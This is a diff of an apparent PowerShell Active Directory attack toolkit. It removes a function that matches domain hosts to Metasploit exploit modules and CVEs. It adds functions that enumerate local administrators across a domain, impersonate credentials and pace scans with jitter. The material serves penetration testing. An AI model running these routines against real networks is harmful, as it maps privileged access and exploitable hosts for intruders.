+ if ($Up) {
+ # check if the current user has local admin access to this server
+ $Access = Test-AdminAccess -ComputerName $TargetComputer
+ if ($Access.IsAdmin) {
+ $TargetComputer
+ }
}
}
- }
-
- }
-
- process {
-
- if($Threads) {
- Write-Verbose "Using threading with threads = $Threads"
- # if we're using threading, kick off the script block with Invoke-ThreadedFunction
- $ScriptParams = @{
- 'Ping' = $(-not $NoPing)
+ if ($TokenHandle) {
+ Invoke-RevertToSelf
}
-
- # kick off the threaded script block + arguments
- Invoke-ThreadedFunction -ComputerName $ComputerName -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads
}
- else {
- if(-not $NoPing -and ($ComputerName.count -ne 1)) {
- # ping all hosts in parallel
- $Ping = {param($ComputerName) if(Test-Connection -ComputerName $ComputerName -Count 1 -Quiet -ErrorAction Stop){$ComputerName}}
- $ComputerName = Invoke-ThreadedFunction -NoImports -ComputerName $ComputerName -ScriptBlock $Ping -Threads 100
+ $LogonToken = $Null
+ if ($PSBoundParameters['Credential']) {
+ if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {
+ $LogonToken = Invoke-UserImpersonation -Credential $Credential
}
+ else {
+ $LogonToken = Invoke-UserImpersonation -Credential $Credential -Quiet
+ }
+ }
+ }
- Write-Verbose "[*] Total number of active hosts: $($ComputerName.count)"
- $Counter = 0
+ PROCESS {
+ # only ignore threading if -Delay is passed
+ if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {
- ForEach ($Computer in $ComputerName) {
+ Write-Verbose "[Find-LocalAdminAccess] Total number of hosts: $($TargetComputers.count)"
+ Write-Verbose "[Find-LocalAdminAccess] Delay: $Delay, Jitter: $Jitter"
+ $Counter = 0
+ $RandNo = New-Object System.Random
+ ForEach ($TargetComputer in $TargetComputers) {
$Counter = $Counter + 1
# sleep for our semi-randomized interval
Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)
- Write-Verbose "[*] Enumerating server $Computer ($Counter of $($ComputerName.count))"
- Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $Computer, $False
+ Write-Verbose "[Find-LocalAdminAccess] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))"
+ Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $LogonToken
+ }
+ }
+ else {
+ Write-Verbose "[Find-LocalAdminAccess] Using threading with threads: $Threads"
+
+ # if we're using threading, kick off the script block with New-ThreadedFunction
+ $ScriptParams = @{
+ 'TokenHandle' = $LogonToken
}
+
+ # if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params
+ New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads
}
}
}
-function Get-ExploitableSystem {
+function Find-DomainLocalGroupMember {
<#
- .Synopsis
-
- This module will query Active Directory for the hostname, OS version, and service pack level
- for each computer account. That information is then cross-referenced against a list of common
- Metasploit exploits that can be used during penetration testing.
-
- .DESCRIPTION
-
- This module will query Active Directory for the hostname, OS version, and service pack level
- for each computer account. That information is then cross-referenced against a list of common
- Metasploit exploits that can be used during penetration testing. The script filters out disabled
- domain computers and provides the computer's last logon time to help determine if it's been
- decommissioned. Also, since the script uses data tables to output affected systems the results
- can be easily piped to other commands such as test-connection or a Export-Csv.
-
- .PARAMETER ComputerName
-
- Return computers with a specific name, wildcards accepted.
-
- .PARAMETER SPN
-
- Return computers with a specific service principal name, wildcards accepted.
-
- .PARAMETER OperatingSystem
-
- Return computers with a specific operating system, wildcards accepted.
-
- .PARAMETER ServicePack
-
- Return computers with a specific service pack, wildcards accepted.
-
- .PARAMETER Filter
-
- A customized ldap filter string to use, e.g. "(description=*admin*)"
-
- .PARAMETER Ping
-
- Switch. Ping each host to ensure it's up before enumerating.
-
- .PARAMETER Domain
-
- The domain to query for computers, defaults to the current domain.
-
- .PARAMETER DomainController
-
- Domain controller to reflect LDAP queries through.
-
- .PARAMETER ADSpath
-
- The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
- Useful for OU queries.
-
- .PARAMETER Unconstrained
-
- Switch. Return computer objects that have unconstrained delegation.
-
- .PARAMETER PageSize
-
- The PageSize to set for the LDAP searcher object.
+.SYNOPSIS
- .PARAMETER Credential
+Enumerates the members of specified local group (default administrators)
+for all the targeted machines on the current (or specified) domain.
- A [Management.Automation.PSCredential] object of alternate credentials
- for connection to the target domain.
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetLocalGroupMember, New-ThreadedFunction
- .EXAMPLE
-
- The example below shows the standard command usage. Disabled system are excluded by default, but
- the "LastLgon" column can be used to determine which systems are live. Usually, if a system hasn't
- logged on for two or more weeks it's been decommissioned.
- PS C:\> Get-ExploitableSystem -DomainController 192.168.1.1 -Credential demo.com\user | Format-Table -AutoSize
- [*] Grabbing computer accounts from Active Directory...
- [*] Loading exploit list for critical missing patches...
- [*] Checking computers for vulnerable OS and SP levels...
- [+] Found 5 potentially vulnerable systems!
- ComputerName OperatingSystem ServicePack LastLogon MsfModule CVE
- ------------ --------------- ----------- --------- --------- ---
- ADS.demo.com Windows Server 2003 Service Pack 2 4/8/2015 5:46:52 PM exploit/windows/dcerpc/ms07_029_msdns_zonename http://www.cvedetails....
- ADS.demo.com Windows Server 2003 Service Pack 2 4/8/2015 5:46:52 PM exploit/windows/smb/ms08_067_netapi http://www.cvedetails....
- ADS.demo.com Windows Server 2003 Service Pack 2 4/8/2015 5:46:52 PM exploit/windows/smb/ms10_061_spoolss http://www.cvedetails....
- LVA.demo.com Windows Server 2003 Service Pack 2 4/8/2015 1:44:46 PM exploit/windows/dcerpc/ms07_029_msdns_zonename http://www.cvedetails....
- LVA.demo.com Windows Server 2003 Service Pack 2 4/8/2015 1:44:46 PM exploit/windows/smb/ms08_067_netapi http://www.cvedetails....
- LVA.demo.com Windows Server 2003 Service Pack 2 4/8/2015 1:44:46 PM exploit/windows/smb/ms10_061_spoolss http://www.cvedetails....
- assess-xppro.demo.com Windows XP Professional Service Pack 3 4/1/2014 11:11:54 AM exploit/windows/smb/ms08_067_netapi http://www.cvedetails....
- assess-xppro.demo.com Windows XP Professional Service Pack 3 4/1/2014 11:11:54 AM exploit/windows/smb/ms10_061_spoolss http://www.cvedetails....
- HVA.demo.com Windows Server 2003 Service Pack 2 11/5/2013 9:16:31 PM exploit/windows/dcerpc/ms07_029_msdns_zonename http://www.cvedetails....
- HVA.demo.com Windows Server 2003 Service Pack 2 11/5/2013 9:16:31 PM exploit/windows/smb/ms08_067_netapi http://www.cvedetails....
- HVA.demo.com Windows Server 2003 Service Pack 2 11/5/2013 9:16:31 PM exploit/windows/smb/ms10_061_spoolss http://www.cvedetails....
- DB1.demo.com Windows Server 2003 Service Pack 2 3/22/2012 5:05:34 PM exploit/windows/dcerpc/ms07_029_msdns_zonename http://www.cvedetails....
- DB1.demo.com Windows Server 2003 Service Pack 2 3/22/2012 5:05:34 PM exploit/windows/smb/ms08_067_netapi http://www.cvedetails....
- DB1.demo.com Windows Server 2003 Service Pack 2 3/22/2012 5:05:34 PM exploit/windows/smb/ms10_061_spoolss http://www.cvedetails....
+.DESCRIPTION
- .EXAMPLE
+This function enumerates all machines on the current (or specified) domain
+using Get-DomainComputer, and enumerates the members of the specified local
+group (default of Administrators) for each machine using Get-NetLocalGroupMember.
+By default, the API method is used, but this can be modified with '-Method winnt'
+to use the WinNT service provider.
- PS C:\> Get-ExploitableSystem | Export-Csv c:\temp\output.csv -NoTypeInformation
+.PARAMETER ComputerName
- How to write the output to a csv file.
+Specifies an array of one or more hosts to enumerate, passable on the pipeline.
+If -ComputerName is not passed, the default behavior is to enumerate all machines
+in the domain returned by Get-DomainComputer.
- .EXAMPLE
+.PARAMETER ComputerDomain
- PS C:\> Get-ExploitableSystem -Domain testlab.local -Ping
+Specifies the domain to query for computers, defaults to the current domain.
- Return a set of live hosts from the testlab.local domain
+.PARAMETER ComputerLDAPFilter
- .LINK
-
- http://www.netspi.com
- https://github.com/nullbind/Powershellery/blob/master/Stable-ish/ADS/Get-ExploitableSystems.psm1
-
- .NOTES
-
- Author: Scott Sutherland - 2015, NetSPI
- Modifications to integrate into PowerView by @harmj0y
- Version: Get-ExploitableSystem.psm1 v1.1
- Comments: The technique used to query LDAP was based on the "Get-AuditDSComputerAccount"
- function found in Carols Perez's PoshSec-Mod project. The general idea is based off of
- Will Schroeder's "Invoke-FindVulnSystems" function from the PowerView toolkit.
-#>
- [CmdletBinding()]
- Param(
- [Parameter(ValueFromPipeline=$True)]
- [Alias('HostName')]
- [String]
- $ComputerName = '*',
-
- [String]
- $SPN,
-
- [String]
- $OperatingSystem = '*',
-
- [String]
- $ServicePack = '*',
-
- [String]
- $Filter,
-
- [Switch]
- $Ping,
-
- [String]
- $Domain,
-
- [String]
- $DomainController,
-
- [String]
- $ADSpath,
+Specifies an LDAP query string that is used to search for computer objects.
- [Switch]
- $Unconstrained,
-
- [ValidateRange(1,10000)]
- [Int]
- $PageSize = 200,
-
- [Management.Automation.PSCredential]
- $Credential
- )
-
- Write-Verbose "[*] Grabbing computer accounts from Active Directory..."
-
- # Create data table for hostnames, os, and service packs from LDAP
- $TableAdsComputers = New-Object System.Data.DataTable
- $Null = $TableAdsComputers.Columns.Add('Hostname')
- $Null = $TableAdsComputers.Columns.Add('OperatingSystem')
- $Null = $TableAdsComputers.Columns.Add('ServicePack')
- $Null = $TableAdsComputers.Columns.Add('LastLogon')
-
- Get-NetComputer -FullData @PSBoundParameters | ForEach-Object {
-
- $CurrentHost = $_.dnshostname
- $CurrentOs = $_.operatingsystem
- $CurrentSp = $_.operatingsystemservicepack
- $CurrentLast = $_.lastlogon
- $CurrentUac = $_.useraccountcontrol
-
- $CurrentUacBin = [convert]::ToString($_.useraccountcontrol,2)
-
- # Check the 2nd to last value to determine if its disabled
- $DisableOffset = $CurrentUacBin.Length - 2
- $CurrentDisabled = $CurrentUacBin.Substring($DisableOffset,1)
-
- # Add computer to list if it's enabled
- if ($CurrentDisabled -eq 0) {
- # Add domain computer to data table
- $Null = $TableAdsComputers.Rows.Add($CurrentHost,$CurrentOS,$CurrentSP,$CurrentLast)
- }
- }
-
- # Status user
- Write-Verbose "[*] Loading exploit list for critical missing patches..."
-
- # ----------------------------------------------------------------
- # Setup data table for list of msf exploits
- # ----------------------------------------------------------------
-
- # Create data table for list of patches levels with a MSF exploit
- $TableExploits = New-Object System.Data.DataTable
- $Null = $TableExploits.Columns.Add('OperatingSystem')
- $Null = $TableExploits.Columns.Add('ServicePack')
- $Null = $TableExploits.Columns.Add('MsfModule')
- $Null = $TableExploits.Columns.Add('CVE')
-
- # Add exploits to data table
- $Null = $TableExploits.Rows.Add("Windows 7","","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729")
- $Null = $TableExploits.Rows.Add("Windows Server 2000","Server Pack 1","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/")
- $Null = $TableExploits.Rows.Add("Windows Server 2000","Server Pack 1","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059")
- $Null = $TableExploits.Rows.Add("Windows Server 2000","Server Pack 1","exploit/windows/iis/ms03_007_ntdll_webdav","http://www.cvedetails.com/cve/2003-0109")
- $Null = $TableExploits.Rows.Add("Windows Server 2000","Server Pack 1","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/")
- $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 2","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/")
- $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 2","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059")
- $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 2","exploit/windows/iis/ms03_007_ntdll_webdav","http://www.cvedetails.com/cve/2003-0109")
- $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 2","exploit/windows/smb/ms04_011_lsass","http://www.cvedetails.com/cve/2003-0533/")
- $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 2","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/")
- $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 3","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/")
- $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 3","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059")
- $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 3","exploit/windows/iis/ms03_007_ntdll_webdav","http://www.cvedetails.com/cve/2003-0109")
- $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 3","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/")
- $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/")
- $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059")
- $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/dcerpc/ms07_029_msdns_zonename","http://www.cvedetails.com/cve/2007-1748")
- $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/smb/ms04_011_lsass","http://www.cvedetails.com/cve/2003-0533/")
- $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439")
- $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/smb/ms06_066_nwapi","http://www.cvedetails.com/cve/2006-4688")
- $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/smb/ms06_070_wkssvc","http://www.cvedetails.com/cve/2006-4691")
- $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250")
- $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/")
- $Null = $TableExploits.Rows.Add("Windows Server 2000","","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/")
- $Null = $TableExploits.Rows.Add("Windows Server 2000","","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059")
- $Null = $TableExploits.Rows.Add("Windows Server 2000","","exploit/windows/iis/ms03_007_ntdll_webdav","http://www.cvedetails.com/cve/2003-0109")
- $Null = $TableExploits.Rows.Add("Windows Server 2000","","exploit/windows/smb/ms05_039_pnp","http://www.cvedetails.com/cve/2005-1983")
- $Null = $TableExploits.Rows.Add("Windows Server 2000","","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/")
- $Null = $TableExploits.Rows.Add("Windows Server 2003","Server Pack 1","exploit/windows/dcerpc/ms07_029_msdns_zonename","http://www.cvedetails.com/cve/2007-1748")
- $Null = $TableExploits.Rows.Add("Windows Server 2003","Server Pack 1","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439")
- $Null = $TableExploits.Rows.Add("Windows Server 2003","Server Pack 1","exploit/windows/smb/ms06_066_nwapi","http://www.cvedetails.com/cve/2006-4688")
- $Null = $TableExploits.Rows.Add("Windows Server 2003","Server Pack 1","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250")
- $Null = $TableExploits.Rows.Add("Windows Server 2003","Server Pack 1","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/")
- $Null = $TableExploits.Rows.Add("Windows Server 2003","Service Pack 2","exploit/windows/dcerpc/ms07_029_msdns_zonename","http://www.cvedetails.com/cve/2007-1748")
- $Null = $TableExploits.Rows.Add("Windows Server 2003","Service Pack 2","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250")
- $Null = $TableExploits.Rows.Add("Windows Server 2003","Service Pack 2","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729")
- $Null = $TableExploits.Rows.Add("Windows Server 2003","","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/")
- $Null = $TableExploits.Rows.Add("Windows Server 2003","","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439")
- $Null = $TableExploits.Rows.Add("Windows Server 2003","","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250")
- $Null = $TableExploits.Rows.Add("Windows Server 2003","","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/")
- $Null = $TableExploits.Rows.Add("Windows Server 2003 R2","","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/")
- $Null = $TableExploits.Rows.Add("Windows Server 2003 R2","","exploit/windows/smb/ms04_011_lsass","http://www.cvedetails.com/cve/2003-0533/")
- $Null = $TableExploits.Rows.Add("Windows Server 2003 R2","","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439")
- $Null = $TableExploits.Rows.Add("Windows Server 2003 R2","","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/")
- $Null = $TableExploits.Rows.Add("Windows Server 2008","Service Pack 2","exploit/windows/smb/ms09_050_smb2_negotiate_func_index","http://www.cvedetails.com/cve/2009-3103")
- $Null = $TableExploits.Rows.Add("Windows Server 2008","Service Pack 2","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729")
- $Null = $TableExploits.Rows.Add("Windows Server 2008","","exploit/windows/smb/ms09_050_smb2_negotiate_func_index","http://www.cvedetails.com/cve/2009-3103")
- $Null = $TableExploits.Rows.Add("Windows Server 2008","","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729")
- $Null = $TableExploits.Rows.Add("Windows Server 2008 R2","","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729")
- $Null = $TableExploits.Rows.Add("Windows Vista","Server Pack 1","exploit/windows/smb/ms09_050_smb2_negotiate_func_index","http://www.cvedetails.com/cve/2009-3103")
- $Null = $TableExploits.Rows.Add("Windows Vista","Server Pack 1","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729")
- $Null = $TableExploits.Rows.Add("Windows Vista","Service Pack 2","exploit/windows/smb/ms09_050_smb2_negotiate_func_index","http://www.cvedetails.com/cve/2009-3103")
- $Null = $TableExploits.Rows.Add("Windows Vista","Service Pack 2","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729")
- $Null = $TableExploits.Rows.Add("Windows Vista","","exploit/windows/smb/ms09_050_smb2_negotiate_func_index","http://www.cvedetails.com/cve/2009-3103")
- $Null = $TableExploits.Rows.Add("Windows XP","Server Pack 1","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/")
- $Null = $TableExploits.Rows.Add("Windows XP","Server Pack 1","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059")
- $Null = $TableExploits.Rows.Add("Windows XP","Server Pack 1","exploit/windows/smb/ms04_011_lsass","http://www.cvedetails.com/cve/2003-0533/")
- $Null = $TableExploits.Rows.Add("Windows XP","Server Pack 1","exploit/windows/smb/ms05_039_pnp","http://www.cvedetails.com/cve/2005-1983")
- $Null = $TableExploits.Rows.Add("Windows XP","Server Pack 1","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439")
- $Null = $TableExploits.Rows.Add("Windows XP","Service Pack 2","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059")
- $Null = $TableExploits.Rows.Add("Windows XP","Service Pack 2","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439")
- $Null = $TableExploits.Rows.Add("Windows XP","Service Pack 2","exploit/windows/smb/ms06_066_nwapi","http://www.cvedetails.com/cve/2006-4688")
- $Null = $TableExploits.Rows.Add("Windows XP","Service Pack 2","exploit/windows/smb/ms06_070_wkssvc","http://www.cvedetails.com/cve/2006-4691")
- $Null = $TableExploits.Rows.Add("Windows XP","Service Pack 2","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250")
- $Null = $TableExploits.Rows.Add("Windows XP","Service Pack 2","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729")
- $Null = $TableExploits.Rows.Add("Windows XP","Service Pack 3","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250")
- $Null = $TableExploits.Rows.Add("Windows XP","Service Pack 3","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729")
- $Null = $TableExploits.Rows.Add("Windows XP","","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/")
- $Null = $TableExploits.Rows.Add("Windows XP","","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059")
- $Null = $TableExploits.Rows.Add("Windows XP","","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439")
- $Null = $TableExploits.Rows.Add("Windows XP","","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250")
-
- # Status user
- Write-Verbose "[*] Checking computers for vulnerable OS and SP levels..."
-
- # ----------------------------------------------------------------
- # Setup data table to store vulnerable systems
- # ----------------------------------------------------------------
-
- # Create data table to house vulnerable server list
- $TableVulnComputers = New-Object System.Data.DataTable
- $Null = $TableVulnComputers.Columns.Add('ComputerName')
- $Null = $TableVulnComputers.Columns.Add('OperatingSystem')
- $Null = $TableVulnComputers.Columns.Add('ServicePack')
- $Null = $TableVulnComputers.Columns.Add('LastLogon')
- $Null = $TableVulnComputers.Columns.Add('MsfModule')
- $Null = $TableVulnComputers.Columns.Add('CVE')
-
- # Iterate through each exploit
- $TableExploits | ForEach-Object {
-
- $ExploitOS = $_.OperatingSystem
- $ExploitSP = $_.ServicePack
- $ExploitMsf = $_.MsfModule
- $ExploitCVE = $_.CVE
-
- # Iterate through each ADS computer
- $TableAdsComputers | ForEach-Object {
-
- $AdsHostname = $_.Hostname
- $AdsOS = $_.OperatingSystem
- $AdsSP = $_.ServicePack
- $AdsLast = $_.LastLogon
-
- # Add exploitable systems to vul computers data table
- if ($AdsOS -like "$ExploitOS*" -and $AdsSP -like "$ExploitSP" ) {
- # Add domain computer to data table
- $Null = $TableVulnComputers.Rows.Add($AdsHostname,$AdsOS,$AdsSP,$AdsLast,$ExploitMsf,$ExploitCVE)
- }
- }
- }
-
- # Display results
- $VulnComputer = $TableVulnComputers | Select-Object ComputerName -Unique | Measure-Object
- $VulnComputerCount = $VulnComputer.Count
+.PARAMETER ComputerSearchBase
- if ($VulnComputer.Count -gt 0) {
- # Return vulnerable server list order with some hack date casting
- Write-Verbose "[+] Found $VulnComputerCount potentially vulnerable systems!"
- $TableVulnComputers | Sort-Object { $_.lastlogon -as [datetime]} -Descending
- }
- else {
- Write-Verbose "[-] No vulnerable systems were found."
- }
-}
+Specifies the LDAP source to search through for computers,
+e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries.
+.PARAMETER ComputerOperatingSystem
-function Invoke-EnumerateLocalAdmin {
-<#
- .SYNOPSIS
+Search computers with a specific operating system, wildcards accepted.
- This function queries the domain for all active machines with
- Get-NetComputer, then for each server it queries the local
- Administrators with Get-NetLocalGroup.
+.PARAMETER ComputerServicePack
- Author: @harmj0y
- License: BSD 3-Clause
+Search computers with a specific service pack, wildcards accepted.
- .PARAMETER ComputerName
+.PARAMETER ComputerSiteName
- Host array to enumerate, passable on the pipeline.
+Search computers in the specific AD Site name, wildcards accepted.
- .PARAMETER ComputerFile
+.PARAMETER GroupName
- File of hostnames/IPs to search.
+The local group name to query for users. If not given, it defaults to "Administrators".
- .PARAMETER ComputerFilter
+.PARAMETER Method
- Host filter name to query AD for, wildcards accepted.
+The collection method to use, defaults to 'API', also accepts 'WinNT'.
- .PARAMETER ComputerADSpath
+.PARAMETER Server
- The LDAP source to search through for hosts, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
- Useful for OU queries.
+Specifies an Active Directory server (domain controller) to bind to.
- .PARAMETER NoPing
+.PARAMETER SearchScope
- Switch. Don't ping each host to ensure it's up before enumerating.
+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
- .PARAMETER Delay
+.PARAMETER ResultPageSize
- Delay between enumerating hosts, defaults to 0
+Specifies the PageSize to set for the LDAP searcher object.
- .PARAMETER Jitter
+.PARAMETER ServerTimeLimit
- Jitter for the host delay, defaults to +/- 0.3
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
- .PARAMETER OutFile
+.PARAMETER Tombstone
- Output results to a specified csv output file.
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
- .PARAMETER NoClobber
+.PARAMETER Credential
- Switch. Don't overwrite any existing output file.
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain and target systems.
- .PARAMETER TrustGroups
+.PARAMETER Delay
- Switch. Only return results that are not part of the local machine
- or the machine's domain. Old Invoke-EnumerateLocalTrustGroup
- functionality.
-
- .PARAMETER DomainOnly
+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
- Switch. Only return domain (non-local) results
+.PARAMETER Jitter
- .PARAMETER Domain
+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
- Domain to query for machines, defaults to the current domain.
-
- .PARAMETER DomainController
+.PARAMETER Threads
- Domain controller to reflect LDAP queries through.
+The number of threads to use for user searching, defaults to 20.
- .PARAMETER SearchForest
+.EXAMPLE
- Switch. Search all domains in the forest for target users instead of just
- a single domain.
+Find-DomainLocalGroupMember
- .PARAMETER API
+Enumerates the local group memberships for all reachable machines in the current domain.
- Switch. Use API calls instead of the WinNT service provider. Less information,
- but the results are faster.
+.EXAMPLE
- .PARAMETER Threads
+Find-DomainLocalGroupMember -Domain dev.testlab.local
- The maximum concurrent threads to execute.
+Enumerates the local group memberships for all reachable machines the dev.testlab.local domain.
- .EXAMPLE
+.EXAMPLE
- PS C:\> Invoke-EnumerateLocalAdmin
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Find-DomainLocalGroupMember -Domain testlab.local -Credential $Cred
- Enumerates the members of local administrators for all machines
- in the current domain.
+Enumerates the local group memberships for all reachable machines the dev.testlab.local
+domain using the alternate credentials.
- .EXAMPLE
+.OUTPUTS
- PS C:\> Invoke-EnumerateLocalAdmin -Threads 10
+PowerView.LocalGroupMember.API
- Threaded local admin enumeration, replaces Invoke-EnumerateLocalAdminThreaded
+Custom PSObject with translated group property fields from API results.
- .LINK
+PowerView.LocalGroupMember.WinNT
- http://blog.harmj0y.net/
+Custom PSObject with translated group property fields from WinNT results.
#>
- [CmdletBinding()]
- param(
- [Parameter(Position=0,ValueFromPipeline=$True)]
- [Alias('Hosts')]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.LocalGroupMember.API')]
+ [OutputType('PowerView.LocalGroupMember.WinNT')]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('DNSHostName')]
[String[]]
$ComputerName,
- [ValidateScript({Test-Path -Path $_ })]
- [Alias('HostList')]
+ [ValidateNotNullOrEmpty()]
[String]
- $ComputerFile,
+ $ComputerDomain,
+ [ValidateNotNullOrEmpty()]
[String]
- $ComputerFilter,
+ $ComputerLDAPFilter,
+ [ValidateNotNullOrEmpty()]
[String]
- $ComputerADSpath,
-
- [Switch]
- $NoPing,
-
- [UInt32]
- $Delay = 0,
+ $ComputerSearchBase,
- [Double]
- $Jitter = .3,
+ [ValidateNotNullOrEmpty()]
+ [Alias('OperatingSystem')]
+ [String]
+ $ComputerOperatingSystem,
+ [ValidateNotNullOrEmpty()]
+ [Alias('ServicePack')]
[String]
- $OutFile,
+ $ComputerServicePack,
- [Switch]
- $NoClobber,
+ [ValidateNotNullOrEmpty()]
+ [Alias('SiteName')]
+ [String]
+ $ComputerSiteName,
- [Switch]
- $TrustGroups,
+ [Parameter(ValueFromPipelineByPropertyName = $True)]
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $GroupName = 'Administrators',
- [Switch]
- $DomainOnly,
+ [ValidateSet('API', 'WinNT')]
+ [Alias('CollectionMethod')]
+ [String]
+ $Method = 'API',
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
[String]
- $Domain,
+ $Server,
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
- $DomainController,
+ $SearchScope = 'Subtree',
- [Switch]
- $SearchForest,
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
- [ValidateRange(1,100)]
+ [ValidateRange(1, 10000)]
[Int]
- $Threads,
+ $ServerTimeLimit,
[Switch]
- $API
- )
-
- begin {
- if ($PSBoundParameters['Debug']) {
- $DebugPreference = 'Continue'
- }
-
- # random object for delay
- $RandNo = New-Object System.Random
+ $Tombstone,
